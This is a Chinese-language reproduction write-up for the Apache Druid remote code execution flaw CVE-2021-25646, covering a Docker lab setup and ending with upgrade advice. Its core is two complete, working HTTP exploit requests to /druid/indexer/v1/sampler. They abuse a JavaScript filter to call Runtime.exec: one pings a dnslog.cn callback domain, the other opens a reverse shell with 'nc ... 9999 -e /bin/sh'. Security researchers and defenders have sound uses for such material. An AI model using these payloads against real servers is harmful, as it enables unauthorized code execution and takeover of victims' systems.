Apache Druid 遠程代碼執行 CVE-2021-25646 漏洞復現

Apache Druid 遠程代碼執行 CVE-2021-25646 漏洞復現

前言

Apache Druid 是用Java編寫的面向列的開源分佈式數據存儲，旨在快速獲取大量事件數據，並在數據之上提供低延遲查詢。

由於Apache Druid 默認情況下缺乏授權認證，攻擊者可直接構造惡意請求執行任意代碼，控制服務器，風險極大

影響版本

Apache Druid < 0.20.1

環境搭建

這裏本地用Docker搭建

下載鏈接：https://github.com/apache/druid/archive/druid-0.20.0.zip

解壓後執行：

cd druid-druid-0.20.0/distribution/docker
docker-compose up -d

類似於vulhub得靶場一樣，就直接搭好了，訪問8888端口就是web界面。

看網上也有用 fokkodriesprong/docker-druid的鏡像，應該也是可以的

docker pull fokkodriesprong/docker-druid
docker run --rm -i -p 8888:8888 fokkodriesprong/docker-druid

漏洞復現

這裏有個點，就是poc中請求頭的uri是對應的哪個功能點。這裏我們找一下。

訪問8888端口進入首頁後點擊Load data —> Local disk —> Connect data

右側 base directory 填入：

quickstart/tutorial/

file filter填入：

wikiticker-2015-09-12-sampled.json.gz

點擊apply，接下來一路next，直到下一步是Filter時進行抓包，就抓到了poc中uri對應的數據包了，後面只需改掉data部分即可RCE。

0x01 dnslog測試

嘗試了幾次總會出問題，一個是注意docker搭建完後確認容器是否都啓動了，再有根據自己抓的包改掉POST得data部分即可。

POST /druid/indexer/v1/sampler HTTP/1.1

Host: 192.168.124.153:8888

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0

Accept: application/json, text/plain, */*

Accept-Language: zh,en-US;q=0.7,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: http://192.168.124.153:8888/unified-console.html

Content-Type: application/json;charset=utf-8

Content-Length: 993

Connection: close



{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2021-2-1T14:12:24.050Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('ping yd7wk0.dnslog.cn')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}

0x02 反彈shell

這裏是利用nc反彈的

POST /druid/indexer/v1/sampler HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 1008
Connection: close

{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2021-2-1T14:12:24.050Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec(' nc xxx.xxx.xxx.xxx 9999 -e /bin/sh')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}

修復建議

升級Apache Druid至 0.20.1版本

https://druid.apache.org/downloads.html

Reference

https://www.cnblogs.com/cHr1s/p/14365418.html

https://www.adminxe.com/2109.html